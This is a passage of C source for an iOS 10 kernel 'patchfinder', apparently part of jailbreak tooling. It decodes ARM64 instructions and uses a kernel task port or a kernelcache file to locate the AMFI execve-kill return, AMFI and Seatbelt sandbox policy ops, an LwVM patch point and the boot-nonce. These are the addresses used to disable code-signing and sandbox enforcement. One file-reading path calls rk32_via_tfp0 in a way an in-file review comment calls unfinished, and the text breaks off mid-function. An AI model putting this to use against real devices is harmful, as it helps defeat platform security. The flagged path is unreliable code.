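static uint64_t Replicate(uint64_t val, unsigned bits)
{
    uint64_t ret = val;
    unsigned shift;
    for (shift = bits; shift < 64; shift += bits) { // XXX actually, it is either 32 or 64
        ret |= (val << shift);
    }
    return ret;
}

/*
 * Decode an ARM64 logical-immediate bitmask (N, imms, immr) into *newval.
 * `immediate` enables the extra reserved-encoding check applied to
 * immediate forms. Returns 0 on success, -1 for a reserved encoding.
 */
static int DecodeBitMasks(unsigned immN, unsigned imms, unsigned immr, int immediate, uint64_t *newval)
{
    unsigned levels, S, R, esize;
    int len = HighestSetBit(7, (immN << 6) | (~imms & 0x3F));
    if (len < 1) {
        return -1;
    }
    levels = ZeroExtendOnes(len, 6);
    if (immediate && (imms & levels) == levels) {
        return -1;
    }
    S = imms & levels;
    R = immr & levels;
    esize = 1 << len;  /* element size: 2, 4, 8, 16, 32 or 64 bits */
    *newval = Replicate(RORZeroExtendOnes(S + 1, esize, R), esize);
    return 0;
}

/*
 * Decode one instruction of a MOV-style constant-materialising sequence.
 *
 *   opcode  the 32-bit instruction word
 *   total   value accumulated from the preceding instructions of the sequence
 *   first   non-zero when this is the sequence's first instruction; MOVK and
 *           ADD/SUB only make sense after an initial value, so they are
 *           rejected when first is set
 *   newval  receives the updated value on success
 *
 * Handles MOV (bitmask immediate, i.e. ORR with XZR as source), MOVN/MOVZ/MOVK,
 * and ADD/SUB (immediate) where destination and source register agree.
 * Returns 0 on success, -1 when the instruction is not one of these.
 */
static int DecodeMov(uint32_t opcode, uint64_t total, int first, uint64_t *newval)
{
    unsigned o = (opcode >> 29) & 3;
    unsigned k = (opcode >> 23) & 0x3F;
    unsigned rn, rd;
    uint64_t i;

    if (k == 0x24 && o == 1) { // MOV (bitmask imm) <=> ORR (immediate)
        unsigned s = (opcode >> 31) & 1;
        unsigned N = (opcode >> 22) & 1;
        if (s == 0 && N != 0) {
            return -1;
        }
        rn = (opcode >> 5) & 0x1F;
        if (rn == 31) {
            unsigned imms = (opcode >> 10) & 0x3F;
            unsigned immr = (opcode >> 16) & 0x3F;
            return DecodeBitMasks(N, imms, immr, 1, newval);
        }
    } else if (k == 0x25) { // MOVN/MOVZ/MOVK
        unsigned s = (opcode >> 31) & 1;
        unsigned h = (opcode >> 21) & 3;
        if (s == 0 && h > 1) {
            return -1;
        }
        i = (opcode >> 5) & 0xFFFF;
        h *= 16;   /* hw field selects the 16-bit lane */
        i <<= h;
        if (o == 0) { // MOVN
            *newval = ~i;
            return 0;
        } else if (o == 2) { // MOVZ
            *newval = i;
            return 0;
        } else if (o == 3 && !first) { // MOVK: replace one 16-bit lane of total
            *newval = (total & ~((uint64_t)0xFFFF << h)) | i;
            return 0;
        }
    } else if ((k | 1) == 0x23 && !first) { // ADD (immediate)
        unsigned h = (opcode >> 22) & 3;
        if (h > 1) {
            return -1;
        }
        rd = opcode & 0x1F;
        rn = (opcode >> 5) & 0x1F;
        if (rd != rn) {
            return -1;
        }
        i = (opcode >> 10) & 0xFFF;
        h *= 12;   /* sh bit: immediate shifted left by 12 */
        i <<= h;
        if (o & 2) { // SUB
            *newval = total - i;
            return 0;
        } else { // ADD
            *newval = total + i;
            return 0;
        }
    }

    return -1;
}

/* patchfinder ***************************************************************/

static addr_t
step64(const uint8_t *buf, addr_t start, size_t length, uint32_t what, uint32_t mask)
{
    addr_t end = start + length;
    while (start <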
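end) {
        uint32_t x = *(uint32_t *)(buf + start);
        if ((x & mask) == what) {
            return start;
        }
        start += 4;
    }
    return 0;
}

/*
 * Scan backwards from offset `start`, 4 bytes at a time and at most
 * `length` bytes, for an instruction whose masked bits equal `what`.
 *
 * buf     image the offsets index into
 * start   highest offset examined (inclusive)
 * length  how far below `start` the scan may reach (inclusive bound)
 * what    expected value of (insn & mask)
 * mask    bits of the instruction that take part in the comparison
 *
 * Returns the offset of the first match, or 0 when nothing matches (a hit
 * that genuinely sits at offset 0 is therefore indistinguishable from
 * "not found", exactly as with step64()).
 */
static addr_t
step64_back(const uint8_t *buf, addr_t start, size_t length, uint32_t what, uint32_t mask)
{
    addr_t end;

    /* `start - length` used to wrap here; the loop then never ran and 0
     * came back, so keep that outcome but make it explicit. */
    if (length > start) {
        return 0;
    }
    end = start - length;

    for (;;) {
        uint32_t x = *(uint32_t *)(buf + start);
        if ((x & mask) == what) {
            return start;
        }
        /* Stop before stepping below `end`.  With end == 0 the former
         * `start -= 4` wrapped past zero and the next read left `buf`. */
        if (start < end + 4) {
            break;
        }
        start -= 4;
    }
    return 0;
}

/*
 * Find the beginning of the function that contains offset `where`.
 *
 * Walks backwards, never below `start`, looking for the frame set-up
 * `ADD X29, SP, #imm`; the matching `STP Xn, Xm, [SP, #-imm]!` is expected
 * (imm/16 + 1) instructions earlier and its offset is taken as the entry.
 * Returns that offset, or 0 when no such prologue is found.
 */
static addr_t
bof64(const uint8_t *buf, addr_t start, addr_t where)
{
    if (where < start) {
        return 0;
    }
    for (;;) {
        uint32_t op = *(uint32_t *)(buf + where);
        if ((op & 0xFFC003FF) == 0x910003FD) {
            unsigned delta = (op >> 10) & 0xFFF;
            //printf("%x: ADD X29, SP, #0x%x\n", where, delta);
            /* the STP lives (delta/16 + 1) instructions earlier; make sure
             * that offset exists before dereferencing it */
            if ((delta & 0xF) == 0 && where >= ((delta >> 4) + 1) * 4) {
                addr_t prev = where - ((delta >> 4) + 1) * 4;
                uint32_t au = *(uint32_t *)(buf + prev);
                if ((au & 0xFFC003E0) == 0xA98003E0) {
                    //printf("%x: STP x, y, [SP,#-imm]!\n", prev);
                    return prev;
                }
            }
        }
        /* `where -= 4` used to wrap below zero once start == 0 */
        if (where < start + 4) {
            break;
        }
        where -= 4;
    }
    return 0;
}

/*
 * Find the first instruction in [start, end) that, after a light emulation
 * of ADRP / ADD / LDR / ADR / LDR-literal on a 32-entry register file,
 * leaves the value `what` in its destination register.  Registers start at
 * zero; only the instruction forms below are modelled, everything else is
 * ignored.  Returns the offset of that instruction or 0.
 */
static addr_t
xref64(const uint8_t *buf, addr_t start, addr_t end, addr_t what)
{
    addr_t i;
    uint64_t value[32];

    memset(value, 0, sizeof(value));

    end &= ~3;
    for (i = start & ~3; i < end; i += 4) {
        uint32_t op = *(uint32_t *)(buf + i);
        unsigned reg = op & 0x1F;
        if ((op & 0x9F000000) == 0x90000000) {
            /* ADRP: page-relative immediate, page-aligned base */
            signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);
            //printf("%llx: ADRP X%d, 0x%llx\n", i, reg, ((long long)adr << 1) + (i & ~0xFFF));
            value[reg] = ((long long)adr << 1) + (i & ~0xFFF);
        /*} else if ((op & 0xFFE0FFE0) == 0xAA0003E0) {
            unsigned rd = op & 0x1F;
            unsigned rm = (op >> 16) & 0x1F;
            //printf("%llx: MOV X%d, X%d\n", i, rd, rm);
            value[rd] = value[rm];*/
        } else if ((op & 0xFF000000) ==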
0x91000000) { 271 | unsigned rn = (op >> 5) & 0x1F; 272 | unsigned shift = (op >> 22) & 3; 273 | unsigned imm = (op >> 10) & 0xFFF; 274 | if (shift == 1) { 275 | imm <<= 12; 276 | } else { 277 | //assert(shift == 0); 278 | if (shift > 1) continue; 279 | } 280 | //printf("%llx: ADD X%d, X%d, 0x%x\n", i, reg, rn, imm); 281 | value[reg] = value[rn] + imm; 282 | } else if ((op & 0xF9C00000) == 0xF9400000) { 283 | unsigned rn = (op >> 5) & 0x1F; 284 | unsigned imm = ((op >> 10) & 0xFFF) << 3; 285 | //printf("%llx: LDR X%d, [X%d, 0x%x]\n", i, reg, rn, imm); 286 | if (!imm) continue; // XXX not counted as true xref 287 | value[reg] = value[rn] + imm; // XXX address, not actual value 288 | /*} else if ((op & 0xF9C00000) == 0xF9000000) { 289 | unsigned rn = (op >> 5) & 0x1F; 290 | unsigned imm = ((op >> 10) & 0xFFF) << 3; 291 | //printf("%llx: STR X%d, [X%d, 0x%x]\n", i, reg, rn, imm); 292 | if (!imm) continue; // XXX not counted as true xref 293 | value[rn] = value[rn] + imm; // XXX address, not actual value*/ 294 | } else if ((op & 0x9F000000) == 0x10000000) { 295 | signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8); 296 | //printf("%llx: ADR X%d, 0x%llx\n", i, reg, ((long long)adr >> 11) + i); 297 | value[reg] = ((long long)adr >> 11) + i; 298 | } else if ((op & 0xFF000000) == 0x58000000) { 299 | unsigned adr = (op & 0xFFFFE0) >> 3; 300 | //printf("%llx: LDR X%d, =0x%llx\n", i, reg, adr + i); 301 | value[reg] = adr + i; // XXX address, not actual value 302 | } 303 | if (value[reg] == what) { 304 | return i; 305 | } 306 | } 307 | return 0; 308 | } 309 | 310 | static addr_t 311 | calc64(const uint8_t *buf, addr_t start, addr_t end, int which) 312 | { 313 | addr_t i; 314 | uint64_t value[32]; 315 | 316 | memset(value, 0, sizeof(value)); 317 | 318 | end &= ~3; 319 | for (i = start & ~3; i < end; i += 4) { 320 | uint32_t op = *(uint32_t *)(buf + i); 321 | unsigned reg = op & 0x1F; 322 | if ((op & 0x9F000000) == 0x90000000) { 323 | signed adr = ((op & 0x60000000) 
>> 18) | ((op & 0xFFFFE0) << 8); 324 | //printf("%llx: ADRP X%d, 0x%llx\n", i, reg, ((long long)adr << 1) + (i & ~0xFFF)); 325 | value[reg] = ((long long)adr << 1) + (i & ~0xFFF); 326 | /*} else if ((op & 0xFFE0FFE0) == 0xAA0003E0) { 327 | unsigned rd = op & 0x1F; 328 | unsigned rm = (op >> 16) & 0x1F; 329 | //printf("%llx: MOV X%d, X%d\n", i, rd, rm); 330 | value[rd] = value[rm];*/ 331 | } else if ((op & 0xFF000000) == 0x91000000) { 332 | unsigned rn = (op >> 5) & 0x1F; 333 | unsigned shift = (op >> 22) & 3; 334 | unsigned imm = (op >> 10) & 0xFFF; 335 | if (shift == 1) { 336 | imm <<= 12; 337 | } else { 338 | //assert(shift == 0); 339 | if (shift > 1) continue; 340 | } 341 | //printf("%llx: ADD X%d, X%d, 0x%x\n", i, reg, rn, imm); 342 | value[reg] = value[rn] + imm; 343 | } else if ((op & 0xF9C00000) == 0xF9400000) { 344 | unsigned rn = (op >> 5) & 0x1F; 345 | unsigned imm = ((op >> 10) & 0xFFF) << 3; 346 | //printf("%llx: LDR X%d, [X%d, 0x%x]\n", i, reg, rn, imm); 347 | if (!imm) continue; // XXX not counted as true xref 348 | value[reg] = value[rn] + imm; // XXX address, not actual value 349 | } else if ((op & 0xF9C00000) == 0xF9000000) { 350 | unsigned rn = (op >> 5) & 0x1F; 351 | unsigned imm = ((op >> 10) & 0xFFF) << 3; 352 | //printf("%llx: STR X%d, [X%d, 0x%x]\n", i, reg, rn, imm); 353 | if (!imm) continue; // XXX not counted as true xref 354 | value[rn] = value[rn] + imm; // XXX address, not actual value 355 | } else if ((op & 0x9F000000) == 0x10000000) { 356 | signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8); 357 | //printf("%llx: ADR X%d, 0x%llx\n", i, reg, ((long long)adr >> 11) + i); 358 | value[reg] = ((long long)adr >> 11) + i; 359 | } else if ((op & 0xFF000000) == 0x58000000) { 360 | unsigned adr = (op & 0xFFFFE0) >> 3; 361 | //printf("%llx: LDR X%d, =0x%llx\n", i, reg, adr + i); 362 | value[reg] = adr + i; // XXX address, not actual value 363 | } 364 | } 365 | return value[which]; 366 | } 367 | 368 | static addr_t 369 | 
calc64mov(const uint8_t *buf, addr_t start, addr_t end, int which) 370 | { 371 | addr_t i; 372 | uint64_t value[32]; 373 | 374 | memset(value, 0, sizeof(value)); 375 | 376 | end &= ~3; 377 | for (i = start & ~3; i < end; i += 4) { 378 | uint32_t op = *(uint32_t *)(buf + i); 379 | unsigned reg = op & 0x1F; 380 | uint64_t newval; 381 | int rv = DecodeMov(op, value[reg], 0, &newval); 382 | if (rv == 0) { 383 | if (((op >> 31) & 1) == 0) { 384 | newval &= 0xFFFFFFFF; 385 | } 386 | value[reg] = newval; 387 | } 388 | } 389 | return value[which]; 390 | } 391 | 392 | static addr_t 393 | find_call64(const uint8_t *buf, addr_t start, size_t length) 394 | { 395 | return step64(buf, start, length, 0x94000000, 0xFC000000); 396 | } 397 | 398 | static addr_t 399 | follow_call64(const uint8_t *buf, addr_t call) 400 | { 401 | long long w; 402 | w = *(uint32_t *)(buf + call) & 0x3FFFFFF; 403 | w <<= 64 - 26; 404 | w >>= 64 - 26 - 2; 405 | return call + w; 406 | } 407 | 408 | static addr_t 409 | follow_cbz(const uint8_t *buf, addr_t cbz) 410 | { 411 | return cbz + ((*(int *)(buf + cbz) & 0x3FFFFE0) << 10 >> 13); 412 | } 413 | 414 | /* kernel iOS10 **************************************************************/ 415 | 416 | #include 417 | #include 418 | #include 419 | #include 420 | #include 421 | 422 | #ifdef __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ 423 | #include 424 | size_t kread(uint64_t where, void *p, size_t size); 425 | #endif 426 | 427 | static task_t tfp0; 428 | 429 | static uint8_t *kernel = NULL; 430 | static size_t kernel_size = 0; 431 | 432 | static addr_t xnucore_base = 0; 433 | static addr_t xnucore_size = 0; 434 | static addr_t prelink_base = 0; 435 | static addr_t prelink_size = 0; 436 | static addr_t cstring_base = 0; 437 | static addr_t cstring_size = 0; 438 | static addr_t pstring_base = 0; 439 | static addr_t pstring_size = 0; 440 | static addr_t kerndumpbase = -1; 441 | static addr_t kernel_entry = 0; 442 | static void *kernel_mh = 0; 443 | static addr_t 
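kernel_delta = 0;

/*
 * True when the load command at `q` lies entirely inside the `len`-byte
 * header buffer starting at `buf` and has a plausible, non-zero size.
 * ncmds and cmdsize come from the image being parsed, so the walk in
 * init_patchfinder() must not trust them blindly.
 */
static int
load_cmd_fits(const uint8_t *buf, size_t len, const uint8_t *q)
{
    const struct load_command *cmd = (const struct load_command *)q;
    size_t off = (size_t)(q - buf);
    if (q < buf || off > len || len - off < sizeof(*cmd)) {
        return 0;
    }
    return cmd->cmdsize >= sizeof(*cmd) && cmd->cmdsize <= len - off;
}

/*
 * Load the kernel image into `kernel` and record the segment/section layout
 * that the find_* helpers below rely on.
 *
 * taskfp0   kernel task port; stored in `tfp0` and handed to init_kernel()
 * base      address of the kernel Mach-O header (on-device kread() path;
 *           unused when reading from a file)
 * filename  path of a kernelcache (file path only; unused on-device)
 *
 * On-device (__ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__) the header and
 * then the whole [min, max) range covered by the LC_SEGMENT_64 commands are
 * read through kread(); otherwise every segment is pread() from the file.
 * Returns 0 on success and -1 on failure after printing a message; on
 * failure `kernel` is left NULL so term_kernel() remains safe to call.
 */
int
init_patchfinder(task_t taskfp0, addr_t base, const char *filename)
{
    tfp0 = taskfp0;

    size_t rv;
    uint8_t buf[0x4000];
    unsigned i, j;
    const struct mach_header *hdr = (struct mach_header *)buf;
    const uint8_t *q;
    addr_t min = -1;
    addr_t max = 0;
    int is64 = 0;

    init_kernel(taskfp0);

#ifdef __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__
    /* there is no fd on this path; make the shared close(fd) calls vanish */
#define close(f)
    rv = kread(base, buf, sizeof(buf));
    if (rv != sizeof(buf)) {
        printf("failed kread, got size: %zu \n", rv);
        return -1;
    }
#else /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */
    printf("this code right here has run ............. \n");
    int fd = open(filename, O_RDONLY);
    if (fd < 0) {
        /* was "%s" with an int argument: undefined behaviour on the error path */
        printf("failed at open, got fd: %d \n", fd);
        return -1;
    }

    /* NOTE(review): the header is expected in `buf`, yet rk32_via_tfp0() is
     * never handed `buf`; the read() it replaced is still here, commented
     * out.  Left untouched, but this path looks unfinished - confirm before
     * relying on it. */
    rv = rk32_via_tfp0(tfp0, fd);
    //rv = read(fd, buf, sizeof(buf));
    if (rv != sizeof(buf)) {
        close(fd);
        /* was "%d" with a size_t argument */
        printf("failed at buf read, got rv: %zu \n", rv);
        return -1;
    }
#endif /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */

    if (!MACHO(buf)) {
        close(fd);
        /* `buf` is raw image data, not a C string; show the magic instead */
        printf("failed macho, magic: 0x%08x \n", *(uint32_t *)buf);
        return -1;
    }

    if (IS64(buf)) {
        is64 = 4;   /* mach_header_64 carries one extra `reserved` word */
    }

    /* first pass: segment extent, __TEXT/__cstring, prelink __text, entry */
    q = buf + sizeof(struct mach_header) + is64;
    for (i = 0; i < hdr->ncmds; i++) {
        const struct load_command *cmd = (struct load_command *)q;
        if (!load_cmd_fits(buf, sizeof(buf), q)) {
            close(fd);
            printf("load command %u does not fit the header buffer \n", i);
            return -1;
        }
        if (cmd->cmd == LC_SEGMENT_64 && cmd->cmdsize >= sizeof(struct segment_command_64)) {
            const struct segment_command_64 *seg = (struct segment_command_64 *)q;
            /* sections follow the command; believe nsects only as far as
             * cmdsize says they fit */
            uint32_t nsects = seg->nsects;
            size_t room = (cmd->cmdsize - sizeof(*seg)) / sizeof(struct section_64);
            if (nsects > room) {
                nsects = (uint32_t)room;
            }
            if (min > seg->vmaddr) {
                min = seg->vmaddr;
            }
            if (max < seg->vmaddr + seg->vmsize) {
                max = seg->vmaddr + seg->vmsize;
            }
            if (!strcmp(seg->segname, "__TEXT_EXEC")) {
                xnucore_base = seg->vmaddr;
                xnucore_size = seg->filesize;
            }
            if (!strcmp(seg->segname, "__PLK_TEXT_EXEC")) {
                prelink_base = seg->vmaddr;
                prelink_size = seg->filesize;
            }
            if (!strcmp(seg->segname, "__TEXT")) {
                const struct section_64 *sec = (struct section_64 *)(seg + 1);
                for (j = 0; j < nsects; j++) {
                    if (!strcmp(sec[j].sectname, "__cstring")) {
                        cstring_base = sec[j].addr;
                        cstring_size = sec[j].size;
                    }
                }
            }
            if (!strcmp(seg->segname, "__PRELINK_TEXT")) {
                const struct section_64 *sec = (struct section_64 *)(seg + 1);
                for (j = 0; j < nsects; j++) {
                    if (!strcmp(sec[j].sectname, "__text")) {
                        pstring_base = sec[j].addr;
                        pstring_size = sec[j].size;
                    }
                }
            }
        }
        if (cmd->cmd == LC_UNIXTHREAD) {
            uint32_t *ptr = (uint32_t *)(cmd + 1);   /* ptr[0] = flavor, ptr[1] = count */
            struct {
                uint64_t x[29];  /* General purpose registers x0-x28 */
                uint64_t fp;     /* Frame pointer x29 */
                uint64_t lr;     /* Link register x30 */
                uint64_t sp;     /* Stack pointer x31 */
                uint64_t pc;     /* Program counter */
                uint32_t cpsr;   /* Current program status register */
            } *thread = (void *)(ptr + 2);
            /* flavor 6 is the 64-bit ARM thread state; require it to be present */
            if (cmd->cmdsize >= sizeof(*cmd) + 2 * sizeof(uint32_t) + sizeof(*thread) && ptr[0] == 6) {
                kernel_entry = thread->pc;
            }
        }
        q = q + cmd->cmdsize;
    }

    if (max <= min) {
        /* no LC_SEGMENT_64 at all, or a degenerate layout */
        close(fd);
        printf("no usable segments in header \n");
        return -1;
    }

    /* everything below works with offsets relative to the lowest segment */
    kerndumpbase = min;
    xnucore_base -= kerndumpbase;
    prelink_base -= kerndumpbase;
    cstring_base -= kerndumpbase;
    pstring_base -= kerndumpbase;
    kernel_size = max - min;

#ifdef __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__
    kernel = malloc(kernel_size);
    if (!kernel) {
        printf("failed to malloc kern \n");
        return -1;
    }

    rv = kread(kerndumpbase, kernel, kernel_size);
    if (rv != kernel_size) {
        free(kernel);
        kernel = NULL;   /* keep term_kernel() from freeing it a second time */
        printf("failed to kread kern, rv: %zu \n", rv);
        return -1;
    }

    kernel_mh = kernel + base - min;

    (void)filename;
#undef close
#else /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */
    kernel = calloc(1, kernel_size);
    if (!kernel) {
        close(fd);
        /* was "%d" with a pointer argument */
        printf("failed to calloc kern, size: %zu \n", kernel_size);
        return -1;
    }

    /* second pass (commands already bounds-checked above): copy each
     * segment's file bytes to its place in the image */
    q = buf + sizeof(struct mach_header) + is64;
    for (i = 0; i < hdr->ncmds; i++) {
        const struct load_command *cmd = (struct load_command *)q;
        if (cmd->cmd == LC_SEGMENT_64) {
            const struct segment_command_64 *seg = (struct segment_command_64 *)q;
            size_t sz;
            /* a filesize larger than the remaining vm range would overrun `kernel` */
            if (seg->vmaddr < min || seg->filesize > kernel_size - (seg->vmaddr - min)) {
                close(fd);
                free(kernel);
                kernel = NULL;
                printf("segment %.16s does not fit the image \n", seg->segname);
                return -1;
            }
            sz = pread(fd, kernel + seg->vmaddr - min, seg->filesize, seg->fileoff);
            if (sz != seg->filesize) {
                close(fd);
                free(kernel);
                kernel = NULL;
                printf("sz != seg->filesize, sz: %zu", sz);
                return -1;
            }
            if (!kernel_mh) {
                kernel_mh = kernel + seg->vmaddr - min;
            }
            if (!strcmp(seg->segname, "__LINKEDIT")) {
                /* lets find_symbol() turn file offsets into image offsets */
                kernel_delta = seg->vmaddr - min - seg->fileoff;
            }
        }
        q = q + cmd->cmdsize;
    }

    close(fd);

    (void)base;
#endif /* __ENVIRONMENT_IPHONE_OS_VERSION_MIN_REQUIRED__ */
    return 0;
}

/* Release the image loaded by init_patchfinder(); safe to call more than once. */
void
term_kernel(void)
{
    free(kernel);
    kernel = NULL;
}

/* these operate on VA ******************************************************/

/* (opcode, mask) pairs for step64() / step64_back() */
#define INSN_RET  0xD65F03C0, 0xFFFFFFFF
#define INSN_CALL 0x94000000, 0xFC000000
#define INSN_B    0x14000000, 0xFC000000
#define INSN_CBZ  0x34000000, 0xFC000000

/*
 * Value of register `reg` at virtual address `where`, reconstructed by
 * calc64() from the start of the enclosing function (bof64(); falls back to
 * the start of the text segment `where` lies in).  Returns the value with
 * kerndumpbase added back, or 0 when calc64() yields nothing.
 */
addr_t
find_register_value(addr_t where, int reg)
{
    addr_t val;
    addr_t bof = 0;
    where -= kerndumpbase;
    if (where > xnucore_base) {
        bof = bof64(kernel, xnucore_base, where);
        if (!bof) {
            bof = xnucore_base;
        }
    } else if (where > prelink_base) {
        bof = bof64(kernel, prelink_base, where);
        if (!bof) {
            bof = prelink_base;
        }
    }
    val = calc64(kernel, bof, where, reg);
    if (!val) {
        return 0;
    }
    return val + kerndumpbase;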
649 | } 650 | 651 | addr_t 652 | find_reference(addr_t to, int n, int prelink) 653 | { 654 | addr_t ref, end; 655 | addr_t base = xnucore_base; 656 | addr_t size = xnucore_size; 657 | if (prelink) { 658 | base = prelink_base; 659 | size = prelink_size; 660 | } 661 | if (n <= 0) { 662 | n = 1; 663 | } 664 | end = base + size; 665 | to -= kerndumpbase; 666 | do { 667 | ref = xref64(kernel, base, end, to); 668 | if (!ref) { 669 | return 0; 670 | } 671 | base = ref + 4; 672 | } while (--n > 0); 673 | return ref + kerndumpbase; 674 | } 675 | 676 | addr_t 677 | find_strref(const char *string, int n, int prelink) 678 | { 679 | uint8_t *str; 680 | addr_t base = cstring_base; 681 | addr_t size = cstring_size; 682 | if (prelink) { 683 | base = pstring_base; 684 | size = pstring_size; 685 | } 686 | str = boyermoore_horspool_memmem(kernel + base, size, (uint8_t *)string, strlen(string)); 687 | if (!str) { 688 | return 0; 689 | } 690 | return find_reference(str - kernel + kerndumpbase, n, prelink); 691 | } 692 | 693 | addr_t 694 | find_gPhysBase(void) 695 | { 696 | addr_t ret, val; 697 | addr_t ref = find_strref("\"pmap_map_high_window_bd: insufficient pages", 1, 0); 698 | if (!ref) { 699 | return 0; 700 | } 701 | ref -= kerndumpbase; 702 | ret = step64(kernel, ref, 64, INSN_RET); 703 | if (!ret) { 704 | return 0; 705 | } 706 | val = calc64(kernel, ref, ret, 8); 707 | if (!val) { 708 | return 0; 709 | } 710 | return val + kerndumpbase; 711 | } 712 | 713 | addr_t 714 | find_kernel_pmap(void) 715 | { 716 | addr_t call, bof, val; 717 | addr_t ref = find_strref("\"pmap_map_bd\"", 1, 0); 718 | if (!ref) { 719 | return 0; 720 | } 721 | ref -= kerndumpbase; 722 | call = step64_back(kernel, ref, 64, INSN_CALL); 723 | if (!call) { 724 | return 0; 725 | } 726 | bof = bof64(kernel, xnucore_base, call); 727 | if (!bof) { 728 | return 0; 729 | } 730 | val = calc64(kernel, bof, call, 2); 731 | if (!val) { 732 | return 0; 733 | } 734 | return val + kerndumpbase; 735 | } 736 | 737 | addr_t 738 
| find_amfiret(void) 739 | { 740 | addr_t ret; 741 | addr_t ref = find_strref("AMFI: hook..execve() killing pid %u: %s\n", 1, 1); 742 | if (!ref) { 743 | return 0; 744 | } 745 | ref -= kerndumpbase; 746 | ret = step64(kernel, ref, 512, INSN_RET); 747 | if (!ret) { 748 | return 0; 749 | } 750 | return ret + kerndumpbase; 751 | } 752 | 753 | addr_t 754 | find_ret_0(void) 755 | { 756 | addr_t off; 757 | uint32_t *k; 758 | k = (uint32_t *)(kernel + xnucore_base); 759 | for (off = 0; off < xnucore_size - 4; off += 4, k++) { 760 | if (k[0] == 0xAA1F03E0 && k[1] == 0xD65F03C0) { 761 | return off + xnucore_base + kerndumpbase; 762 | } 763 | } 764 | k = (uint32_t *)(kernel + prelink_base); 765 | for (off = 0; off < prelink_size - 4; off += 4, k++) { 766 | if (k[0] == 0xAA1F03E0 && k[1] == 0xD65F03C0) { 767 | return off + prelink_base + kerndumpbase; 768 | } 769 | } 770 | return 0; 771 | } 772 | 773 | addr_t 774 | find_amfi_memcmpstub(void) 775 | { 776 | addr_t call, dest, reg; 777 | addr_t ref = find_strref("%s: Possible race detected. 
Rejecting.", 1, 1); 778 | if (!ref) { 779 | return 0; 780 | } 781 | ref -= kerndumpbase; 782 | call = step64_back(kernel, ref, 64, INSN_CALL); 783 | if (!call) { 784 | return 0; 785 | } 786 | dest = follow_call64(kernel, call); 787 | if (!dest) { 788 | return 0; 789 | } 790 | reg = calc64(kernel, dest, dest + 8, 16); 791 | if (!reg) { 792 | return 0; 793 | } 794 | return reg + kerndumpbase; 795 | } 796 | 797 | addr_t 798 | find_sbops(void) 799 | { 800 | addr_t off, what; 801 | uint8_t *str = boyermoore_horspool_memmem(kernel + pstring_base, pstring_size, (uint8_t *)"Seatbelt sandbox policy", sizeof("Seatbelt sandbox policy") - 1); 802 | if (!str) { 803 | return 0; 804 | } 805 | what = str - kernel + kerndumpbase; 806 | for (off = 0; off < kernel_size - prelink_base; off += 8) { 807 | if (*(uint64_t *)(kernel + prelink_base + off) == what) { 808 | return *(uint64_t *)(kernel + prelink_base + off + 24); 809 | } 810 | } 811 | return 0; 812 | } 813 | 814 | addr_t 815 | find_lwvm_mapio_patch(void) 816 | { 817 | addr_t call, dest, reg; 818 | addr_t ref = find_strref("_mapForIO", 1, 1); 819 | if (!ref) { 820 | return 0; 821 | } 822 | ref -= kerndumpbase; 823 | call = step64(kernel, ref, 64, INSN_CALL); 824 | if (!call) { 825 | return 0; 826 | } 827 | call = step64(kernel, call + 4, 64, INSN_CALL); 828 | if (!call) { 829 | return 0; 830 | } 831 | dest = follow_call64(kernel, call); 832 | if (!dest) { 833 | return 0; 834 | } 835 | reg = calc64(kernel, dest, dest + 8, 16); 836 | if (!reg) { 837 | return 0; 838 | } 839 | return reg + kerndumpbase; 840 | } 841 | 842 | addr_t 843 | find_lwvm_mapio_newj(void) 844 | { 845 | addr_t call; 846 | addr_t ref = find_strref("_mapForIO", 1, 1); 847 | if (!ref) { 848 | return 0; 849 | } 850 | ref -= kerndumpbase; 851 | call = step64(kernel, ref, 64, INSN_CALL); 852 | if (!call) { 853 | return 0; 854 | } 855 | call = step64(kernel, call + 4, 64, INSN_CALL); 856 | if (!call) { 857 | return 0; 858 | } 859 | call = step64(kernel, call + 4, 
64, INSN_CALL); 860 | if (!call) { 861 | return 0; 862 | } 863 | call = step64_back(kernel, call, 64, INSN_B); 864 | if (!call) { 865 | return 0; 866 | } 867 | return call + 4 + kerndumpbase; 868 | } 869 | 870 | addr_t 871 | find_cpacr_write(void) 872 | { 873 | addr_t off; 874 | uint32_t *k; 875 | k = (uint32_t *)(kernel + xnucore_base); 876 | for (off = 0; off < xnucore_size - 4; off += 4, k++) { 877 | if (k[0] == 0xd5181040) { 878 | return off + xnucore_base + kerndumpbase; 879 | } 880 | } 881 | return 0; 882 | } 883 | 884 | addr_t 885 | find_str(const char *string) 886 | { 887 | uint8_t *str = boyermoore_horspool_memmem(kernel, kernel_size, (uint8_t *)string, strlen(string)); 888 | if (!str) { 889 | return 0; 890 | } 891 | return str - kernel + kerndumpbase; 892 | } 893 | 894 | addr_t 895 | find_entry(void) 896 | { 897 | /* XXX returns an unslid address */ 898 | return kernel_entry; 899 | } 900 | 901 | const unsigned char * 902 | find_mh(void) 903 | { 904 | return kernel_mh; 905 | } 906 | 907 | addr_t 908 | find_amfiops(void) 909 | { 910 | addr_t off, what; 911 | uint8_t *str = boyermoore_horspool_memmem(kernel + pstring_base, pstring_size, (uint8_t *)"Apple Mobile File Integrity", sizeof("Apple Mobile File Integrity") - 1); 912 | if (!str) { 913 | return 0; 914 | } 915 | what = str - kernel + kerndumpbase; 916 | /* XXX will only work on a dumped kernel */ 917 | for (off = 0; off < kernel_size - prelink_base; off += 8) { 918 | if (*(uint64_t *)(kernel + prelink_base + off) == what) { 919 | return *(uint64_t *)(kernel + prelink_base + off + 0x18); 920 | } 921 | } 922 | return 0; 923 | } 924 | 925 | addr_t 926 | find_sysbootnonce(void) 927 | { 928 | addr_t off, what; 929 | uint8_t *str = boyermoore_horspool_memmem(kernel + cstring_base, cstring_size, (uint8_t *)"com.apple.System.boot-nonce", sizeof("com.apple.System.boot-nonce") - 1); 930 | if (!str) { 931 | return 0; 932 | } 933 | what = str - kernel + kerndumpbase; 934 | for (off = 0; off < kernel_size - 
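xnucore_base; off += 8) {
        if (*(uint64_t *)(kernel + xnucore_base + off) == what) {
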